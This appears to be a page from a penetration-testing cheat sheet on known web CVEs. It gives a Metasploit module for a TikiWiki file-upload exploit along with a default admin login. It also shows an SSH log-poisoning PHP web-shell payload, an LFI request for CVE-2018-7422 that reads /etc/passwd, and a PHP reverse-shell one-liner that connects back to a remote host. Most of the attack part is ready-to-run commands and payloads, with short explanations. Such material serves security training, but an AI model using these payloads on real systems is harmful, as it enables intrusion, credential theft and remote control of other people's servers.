Known web CVE's

TikiWiki File Upload vulnerability

To exploit the TikiWiki File Upload vulnerability, use the following Metasploit command to perform an unrestricted file upload:

# Use unix/webapp/tikiwiki_upload_exec
# If you find this unrestricted file upload, you can use the msfconsole command to exploit it.
# The default login page of tikiwiki is usually admin:admin
Use unix/webapp/tikiwiki_upload_exec

Log Poisoning and LFI example CVE-2018-7422 (Wordpress)

# Inject a malicious PHP payload into SSH to store it in the auth log file
Ssh '<?php system($_GET["c"]); ?>@IP'

# Exploit a Local File Inclusion (LFI) vulnerability in WordPress (CVE-2018-7422)
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

# Combine LFI and log poisoning to get a shell, inject PHP reverse shell into a specific machine
ajax_path=var/log/auth.log&c=ifconfig

# PHP code to establish a reverse shell to a remote host
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

GitHub - RoqueNight/LFI---RCE-Cheat-Sheet: Transition form local file inclusion attacks to remote code exectionGitHub

Explanation:

The Ssh '<?php system($_GET["c"]); ?>@IP' command illustrates injecting a PHP payload to execute commands on the target system via SSH log poisoning.
The LFI example shows how to access the /etc/passwd file using a vulnerable WordPress plugin, indicating a directory traversal attack.
Combining LFI and log poisoning involves altering application logs to include malicious PHP code, leading to code execution when the log file is included via LFI.
The PHP reverse shell command uses socket programming to connect back to an attacker's machine, offering a shell interface for remote command execution.

PreviouscUrl cheatsheet NextJavaScript Obfuscation/Deobfuscation

Last updated 57 minutes ago